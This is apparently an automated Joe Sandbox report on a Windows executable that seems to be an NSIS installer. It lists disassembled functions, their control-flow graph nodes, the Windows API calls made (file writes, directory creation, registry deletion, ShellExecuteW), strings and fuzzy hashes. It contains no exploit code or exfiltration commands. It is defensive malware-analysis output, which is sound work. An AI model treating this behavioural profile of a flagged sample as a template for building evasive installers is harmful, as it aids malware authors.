                                              control_flow_graph 191 402ee7-402f00 192 402f02 191->192 193 402f09-402f11 191->193 192->193 194 402f13 193->194 195 402f1a-402f1f 193->195 194->195 196 402f21-402f2a call 402ed0 195->196 197 402f2f-402f3c call 402e9e 195->197 196->197 201 402f46-402f4d 197->201 202 402f3e 197->202 204 402f53-402f9a GetTickCount 201->204 205 4030ae-4030b0 201->205 203 402f40-402f41 202->203 208 4030cf-4030d3 203->208 209 402fa0-402fa8 204->209 210 4030cc 204->210 206 4030b2-4030b5 205->206 207 403114-403117 205->207 211 4030b7 206->211 212 4030ba-4030c3 call 402e9e 206->212 213 4030d6-4030dc 207->213 214 403119 207->214 215 402faa 209->215 216 402fad-402fbb call 402e9e 209->216 210->208 211->212 212->202 224 4030c9 212->224 219 4030e1-4030ef call 402e9e 213->219 220 4030de 213->220 214->210 215->216 216->202 225 402fbd-402fc6 216->225 219->202 228 4030f5-403107 WriteFile 219->228 220->219 224->210 227 402fcc-402fec call 406b32 225->227 234 4030a0-4030a2 227->234 235 402ff2-403005 GetTickCount 227->235 230 4030a7-4030a9 228->230 231 403109-40310c 228->231 230->203 231->230 233 40310e-403111 231->233 233->207 234->203 236 403050-403054 235->236 237 403007-40300f 235->237 238 403095-403098 236->238 239 403056-403059 236->239 240 403011-403015 237->240 241 403017-40304d MulDiv wsprintfW call 404a73 237->241 238->209 245 40309e 238->245 243 40307b-403086 239->243 244 40305b-40306f WriteFile 239->244 240->236 240->241 241->236 248 403089-40308d 243->248 244->230 247 403071-403074 244->247 245->210 247->230 249 403076-403079 247->249 248->227 250 403093 248->250 249->248 250->210
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00402F59
                                              • GetTickCount.KERNEL32 ref: 00402FFA
                                              • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403023
                                              • wsprintfW.USER32 ref: 00403036
                                              • WriteFile.KERNELBASE(00000000,00000000,00424D76,004032FA,00000000), ref: 00403067
                                              • WriteFile.KERNEL32(00000000,0041E170,?,00000000,00000000,0041E170,?,000000FF,00000004,00000000,00000000,00000000), ref: 004030FF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: CountFileTickWrite$wsprintf
                                              • String ID: (=C$... %d%%$p!B$pA$pA$vB$vMB
                                              • API String ID: 651206458-1336809268
                                              • Opcode ID: 8c4c8dbab1ebe0afa4682773c2b87886d0ac197ebae181545411c68e098dc53f
                                              • Instruction ID: 169c75f2852f129af83c9b1986440f01f3d96746b5d1a97a5bed7113fa09ea58
                                              • Opcode Fuzzy Hash: 8c4c8dbab1ebe0afa4682773c2b87886d0ac197ebae181545411c68e098dc53f
                                              • Instruction Fuzzy Hash: 1C617B7190121AEBCF10CF65EA446AF7BB8AF44751F14413BE900B72D0D7B89A40DBA9
                                              Function 0040311B Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 251 40311b-403169 GetTickCount GetModuleFileNameW call 4058fe 254 403175-4031a3 call 405ab8 call 406015 call 405ab8 GetFileSize 251->254 255 40316b-403170 251->255 263 403290-40329e call 402e3a 254->263 264 4031a9 254->264 256 40334a-40334e 255->256 271 4032a4-4032a7 263->271 272 403359-40335e 263->272 265 4031ae-4031c5 264->265 267 4031c7 265->267 268 4031c9-4031cb call 402e9e 265->268 267->268 275 4031d0-4031d2 268->275 273 4032d3-4032fd GlobalAlloc call 402ed0 call 402ee7 271->273 274 4032a9-4032c1 call 402ed0 call 402e9e 271->274 272->256 273->272 302 4032ff-403310 273->302 274->272 297 4032c7-4032cd 274->297 277 403351-403358 call 402e3a 275->277 278 4031d8-4031df 275->278 277->272 282 4031e1-4031f5 call 4058ba 278->282 283 40325b-40325f 278->283 287 403269-40326f 282->287 300 4031f7-4031fe 282->300 286 403261-403268 call 402e3a 283->286 283->287 286->287 293 403271-40327b call 406739 287->293 294 40327e-403288 287->294 293->294 294->265 301 40328e 294->301 297->272 297->273 300->287 304 403200-403207 300->304 301->263 305 403312 302->305 306 403318-40331b 302->306 304->287 307 403209-403210 304->307 305->306 308 40331e-403326 306->308 307->287 309 403212-403219 307->309 308->308 310 403328-403343 SetFilePointer call 4058ba 308->310 309->287 312 40321b-40323b 309->312 313 403348 310->313 312->272 314 403241-403245 312->314 313->256 315 403247-40324b 314->315 316 40324d-403255 314->316 315->301 315->316 316->287 317 403257-403259 316->317 317->287
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 0040312C
                                              • GetModuleFileNameW.KERNEL32(00000000,004E80D8,00002004,?,?,?,00000000,004035D7,?), ref: 00403148
                                                • Part of subcall function 004058FE: GetFileAttributesW.KERNELBASE(00000003,0040315B,004E80D8,80000000,00000003,?,?,?,00000000,004035D7,?), ref: 00405902
                                                • Part of subcall function 004058FE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004035D7,?), ref: 00405924
                                              • GetFileSize.KERNEL32(00000000,00000000,004EC0E0,00000000,004D80B8,004D80B8,004E80D8,004E80D8,80000000,00000003,?,?,?,00000000,004035D7,?), ref: 00403194
                                              Strings
                                              • Null, xrefs: 00403212
                                              • soft, xrefs: 00403209
                                              • Error launching installer, xrefs: 0040316B
                                              • Inst, xrefs: 00403200
                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403359
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                              • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                              • API String ID: 4283519449-527102705
                                              • Opcode ID: 689548250178369e8610e5746f9adce2578bd5dbf9f68dd3f6bd973dda8ba485
                                              • Instruction ID: 9295a41ff54e91ce474836f10c0d971f7d59360bd190e5c91fe05c233bc104c6
                                              • Opcode Fuzzy Hash: 689548250178369e8610e5746f9adce2578bd5dbf9f68dd3f6bd973dda8ba485
                                              • Instruction Fuzzy Hash: 4D51D771900208ABDB119FA5DD85BAE7BA8EF04716F14417FE904B62D1DB7C8E808B9D
                                              Function 004018D7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 147stringtimeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • lstrcatW.KERNEL32(00000000,00000000), ref: 00401917
                                              • CompareFileTime.KERNEL32(-00000014,?,%AtlasTreasures%,%AtlasTreasures%,00000000,00000000,%AtlasTreasures%,004D40B0,00000000,00000000), ref: 00401946
                                                • Part of subcall function 00405AB8: lstrcpynW.KERNEL32(?,?,00002004,00403483,004732A0,NSIS Error), ref: 00405AC5
                                                • Part of subcall function 00404A73: lstrlenW.KERNEL32(00447D88,00424D76,74DF23A0,00000000), ref: 00404AAB
                                                • Part of subcall function 00404A73: lstrlenW.KERNEL32(0040304D,00447D88,00424D76,74DF23A0,00000000), ref: 00404ABB
                                                • Part of subcall function 00404A73: lstrcatW.KERNEL32(00447D88,0040304D), ref: 00404ACE
                                                • Part of subcall function 00404A73: SetWindowTextW.USER32(00447D88,00447D88), ref: 00404AE0
                                                • Part of subcall function 00404A73: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404B06
                                                • Part of subcall function 00404A73: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00404B20
                                                • Part of subcall function 00404A73: SendMessageW.USER32(?,00001013,?,00000000), ref: 00404B2E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                              • String ID: %AtlasTreasures%
                                              • API String ID: 1941528284-3870862676
                                              • Opcode ID: 4e2e2bfaca04459f9316266c88af64ec5a68e37a9f2f48202c4a4d3150a7de52
                                              • Instruction ID: b4e8f227fe7a9537edd0b9e90a91ba8e6819ca8d144e35aa4a9caf99775b3aa4
                                              • Opcode Fuzzy Hash: 4e2e2bfaca04459f9316266c88af64ec5a68e37a9f2f48202c4a4d3150a7de52
                                              • Instruction Fuzzy Hash: 6941C471A00614AADB10AB758C85EAF3668EF45329F20423BF416B11E2C77C4A91DFAD
                                              Function 0040172D Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 384 40172d-401741 call 40145c call 405807 389 401743-40175f call 4057b3 CreateDirectoryW 384->389 390 401786-40178a 384->390 397 401761-40176c GetLastError 389->397 398 40177c-401784 389->398 391 4017aa-4017b1 call 401435 390->391 392 40178c-4017a5 call 401435 call 405ab8 SetCurrentDirectoryW 390->392 406 402c58-402c67 391->406 392->406 401 401779 397->401 402 40176e-401777 GetFileAttributesW 397->402 398->389 398->390 401->398 402->398 402->401
                                              APIs
                                                • Part of subcall function 00405807: CharNextW.USER32(?,004CC0A0,0045FE18,?,00406059,0045FE18,0045FE18,le@,004CC0A0,00000002,0040656C,?,004E00C8), ref: 00405815
                                                • Part of subcall function 00405807: CharNextW.USER32(00000000), ref: 0040581A
                                                • Part of subcall function 00405807: CharNextW.USER32(00000000), ref: 00405832
                                              • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,0000005C,00000000), ref: 00401757
                                              • GetLastError.KERNEL32 ref: 00401761
                                              • GetFileAttributesW.KERNELBASE(00000000), ref: 0040176F
                                              • SetCurrentDirectoryW.KERNELBASE(00000000,004D40B0,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040179F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                              • String ID:
                                              • API String ID: 3751793516-0
                                              • Opcode ID: ec289c12e333ee4ac1693090613418d4a5d7498326967ec6e3adcff5c70bf25f
                                              • Instruction ID: e2322852a9c4e47e6d687db6679f044b16e0241981b9ece66bf6cd58216f8cce
                                              • Opcode Fuzzy Hash: ec289c12e333ee4ac1693090613418d4a5d7498326967ec6e3adcff5c70bf25f
                                              • Instruction Fuzzy Hash: 3F01D631904621DBE7206B755D45B6F32A8EF14365B21063BF992F22E2D73C4C81866D
                                              Function 0040592D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 409 40592d-405939 410 40593a-40596e GetTickCount GetTempFileNameW 409->410 411 405970-405972 410->411 412 40597d-40597f 410->412 411->410 413 405974 411->413 414 405977-40597a 412->414 413->414
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 0040594B
                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403392,004DC0C0,004E00C8), ref: 00405966
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: CountFileNameTempTick
                                              • String ID: nsa
                                              • API String ID: 1716503409-2209301699
                                              • Opcode ID: 8f9989655f15aadf8d0cc60edb10422ff76ceb60520498c0bcc2ef1eb9998b51
                                              • Instruction ID: 0cdccb08d4a0cf0f0df5d656a0a7939b265b1f1c47613fc9c1e0506998bbacb4
                                              • Opcode Fuzzy Hash: 8f9989655f15aadf8d0cc60edb10422ff76ceb60520498c0bcc2ef1eb9998b51
                                              • Instruction Fuzzy Hash: C9F06276610608EBDB109F55DE05E9B7BA9EF94720F00803BE984A7190E6B099548B58
                                              Function 0040248E Relevance: 3.0, APIs: 2, Instructions: 45registryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 423 40248e-402492 424 4024c0-4024cd call 40145c 423->424 425 402494-40249f call 40154d 423->425 430 4024db-4024e9 call 401497 424->430 431 4024cf-4024d5 424->431 432 401721-401728 425->432 433 4024a5-4024be call 40145c RegDeleteValueW RegCloseKey 425->433 440 4024eb-4024ed 430->440 431->430 434 402c58-402c67 432->434 433->440 440->434 442 4024f3 440->442 442->434
                                              APIs
                                                • Part of subcall function 0040154D: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,?,?), ref: 00401587
                                              • RegDeleteValueW.KERNELBASE(00000000,00000000), ref: 004024AF
                                              • RegCloseKey.ADVAPI32(00000000), ref: 004024B8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: CloseDeleteOpenValue
                                              • String ID:
                                              • API String ID: 849931509-0
                                              • Opcode ID: 28d58af51618036718c252708d6da1339e8b50d3138fddc83e0f4718e70968a2
                                              • Instruction ID: e1576bc29d89e2789c90d7360848647e5e88d3aa3db4fc6b5d334060f6266443
                                              • Opcode Fuzzy Hash: 28d58af51618036718c252708d6da1339e8b50d3138fddc83e0f4718e70968a2
                                              • Instruction Fuzzy Hash: FE01863250061197EB15EBA49A59B7F7274EB80758F21413FE402BB1E1C67C8D81865D
                                              Function 0040139B Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 443 40139b-4013a0 444 40140c-40140e 443->444 445 401410 444->445 446 4013a2-4013b2 444->446 447 401412-401413 445->447 446->445 448 4013b4-4013b5 call 40159c 446->448 450 4013ba-4013bf 448->450 451 4013c1-4013c9 call 40137c 450->451 452 401416-40141b 450->452 455 4013cb-4013cd 451->455 456 4013cf-4013d4 451->456 452->447 457 4013d6-4013db 455->457 456->457 457->444 458 4013dd-401406 MulDiv SendMessageW 457->458 458->444
                                              APIs
                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: 7d139e0d7de234bcf6a700e513e47626535988416de2a1309b9d7b071a3250d9
                                              • Instruction ID: d821e5382ecf7e63f516690336e344d0ace40c90d4042eade43e4a0886427dd5
                                              • Opcode Fuzzy Hash: 7d139e0d7de234bcf6a700e513e47626535988416de2a1309b9d7b071a3250d9
                                              • Instruction Fuzzy Hash: 2801FF31A202209BEB155F35AC08B6B3698A784315F20427EF855F72F2D678CC829B8C
                                              Function 004058FE Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 459 4058fe-40592a GetFileAttributesW CreateFileW
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(00000003,0040315B,004E80D8,80000000,00000003,?,?,?,00000000,004035D7,?), ref: 00405902
                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004035D7,?), ref: 00405924
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: File$AttributesCreate
                                              • String ID:
                                              • API String ID: 415043291-0
                                              • Opcode ID: 0a2f85832d22be582635bab1499ab015b7246acefa136c2a8fff2ea0c335f580
                                              • Instruction ID: 3557cad305de1e8d8744f7ed922a0974add56b4630c1d6058af0572804785a4b
                                              • Opcode Fuzzy Hash: 0a2f85832d22be582635bab1499ab015b7246acefa136c2a8fff2ea0c335f580
                                              • Instruction Fuzzy Hash: 0AD09E71654201EFEF099F20DE1AF6EBBA2EB84B01F11852CB692940E0DAB15819DB15
                                              Function 004058DE Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 460 4058de-4058eb GetFileAttributesW 461 4058fb 460->461 462 4058ed-4058f5 SetFileAttributesW 460->462 462->461
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,00406701,?,?,?), ref: 004058E2
                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 004058F5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                              • Instruction ID: 9bfeacdea6eb5f2932ef974784812b51c4f8f2d5e5736dd59436ec15d4266534
                                              • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                              • Instruction Fuzzy Hash: 8DC01272404900AAC6001B34DF0881A7B22AB94331B258739B5BAE00F0CB3088A9AA18
                                              Function 00401F9B Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 463 401f9b-401ff3 call 40145c * 4 call 401435 ShellExecuteW 474 402c58-402c67 463->474 475 401ff9 463->475 475->474
                                              APIs
                                              • ShellExecuteW.SHELL32(?,00000000,?,00000000,004D40B0,00000000), ref: 00401FEA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: ExecuteShell
                                              • String ID:
                                              • API String ID: 587946157-0
                                              • Opcode ID: 472f4eeaf3e5161a1656fb81187af857e571e343c78cb304711e9bc17c207397
                                              • Instruction ID: 63966a6383d29ffdfa22f329224652c183dd70f9b2d60f481563a5b1fdafd2c8
                                              • Opcode Fuzzy Hash: 472f4eeaf3e5161a1656fb81187af857e571e343c78cb304711e9bc17c207397
                                              • Instruction Fuzzy Hash: 6DF06232650224A6DB10BBB9DC86BAD37E89B44758F208537F601EA0E2D67CC8C18248
                                              Function 0040154D Relevance: 1.5, APIs: 1, Instructions: 32registryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 478 40154d-40155c 479 401562-401568 478->479 480 40155e-401560 478->480 481 40156e-401599 call 40145c RegOpenKeyExW 479->481 480->481
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(?,00000000,00000000,?,?), ref: 00401587
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Open
                                              • String ID:
                                              • API String ID: 71445658-0
                                              • Opcode ID: 5e993feb771b5cf26465967f746d5e6f11a2072fdff488fd80c6cb0f440dea5c
                                              • Instruction ID: 25f660db1a1e8629dce7ab52a77c94397c675d14e237935d7f32c5267cf96d12
                                              • Opcode Fuzzy Hash: 5e993feb771b5cf26465967f746d5e6f11a2072fdff488fd80c6cb0f440dea5c
                                              • Instruction Fuzzy Hash: E8F0377A250109BBD700DB59DD41FE637DCE744B94F148036FA09DB151C735E44187A9
                                              Function 0040188D Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                              Download Yara Rule
                                              APIs
                                              • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,?,?), ref: 004018A4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
